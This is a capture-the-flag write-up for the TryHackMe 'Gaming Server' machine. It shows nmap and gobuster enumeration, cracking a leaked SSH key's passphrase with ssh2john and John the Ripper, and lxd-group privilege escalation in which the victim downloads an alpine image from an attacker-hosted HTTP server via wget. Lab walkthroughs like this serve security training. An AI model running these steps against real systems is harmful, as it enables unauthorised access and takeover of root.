Tryhackme Gaming Server Writeup.
Enumerating.
First, I started off with a simple nmap scan.
nmap -Pn -sC -sV -v -oA 10.10.173.217
This showed me that there were two ports open on the machine, port 22 for SSH and port 80 for HTTP
Since there was a webpage,Simply checking the source of the websites index page showed a comment at the bottom referring to a user named john
Running gobuster using the common.txt wordlist from dirb revealed a /secret directory and a /uploads directory.
In the /secret index there was a single file named SecretKey and opening it revealed a private ssh key. I copied it to my folder and gave it the right permissions.
Under the folder /uploads there were a few files and a wordlist which I assumed would be for bruteforcing something. So I saved it to my machine.
First i used ssh2john to format the secret key into something john the ripper can read.
We’ll need to convert the ssh key using ssh2john with this command:
> python ssh2john.py SecretKey > doog
Next, I ran the wordlist I found earlier in the uploads I saved mine as Gamers.txt directory on the hash.
> john doog -w=Gamers.txt
Getting User.txt
Now I have a way to access the machine, we can use ssh to log in as the John user
> ssh -i SecretKey john@machine_ip
When prompted for a passphrase, we enter the one found by john the ripper earlier.
Now all we have to do is ls and we have the user.txt
PRIVILEGE ESCALATION
Now we are on the machine but we only have a user account privilege, but want we want is a root user account next that comes in mand is privilege escalation. Fisrt in this box we do
> id
Notice the 108(1xd) in output so wetry to list its images using the command
> lxc images list
so we now take lxd alpine buider into the target machine using the curl command.
lxd alpine builder can be downloaded from the following link:
on the attacker’s machine start a http server which will enable you download the file from the victim’s machine
> python3 -m http.server
And upload it to the victim.
> wget attacker_ip:8000/alpine-v3.12-x86_64–20200831_1414.tar.gz
The exploit then requires that we run a script to complete the privesc, on the hacking article page linked above. What I did was create an sh script with on the victims machine.
> nano exploit.sh
And copy paste the script from the exploit-db page to the script on the victims machine, and then chmod +x the script to make it executable.
> chmod 777 exploit.sh
Once we run the script, we should achieve the privesc and become root.
./exploit.sh -f alpine-v3.12-x86_64–20200831_1414.tar.gz
Now we navigate to this file directory to recover our root flag /mnt/root/root we can ls and find our root.txt file
REGARDS
NIRU IFEDINIRU OZIOMA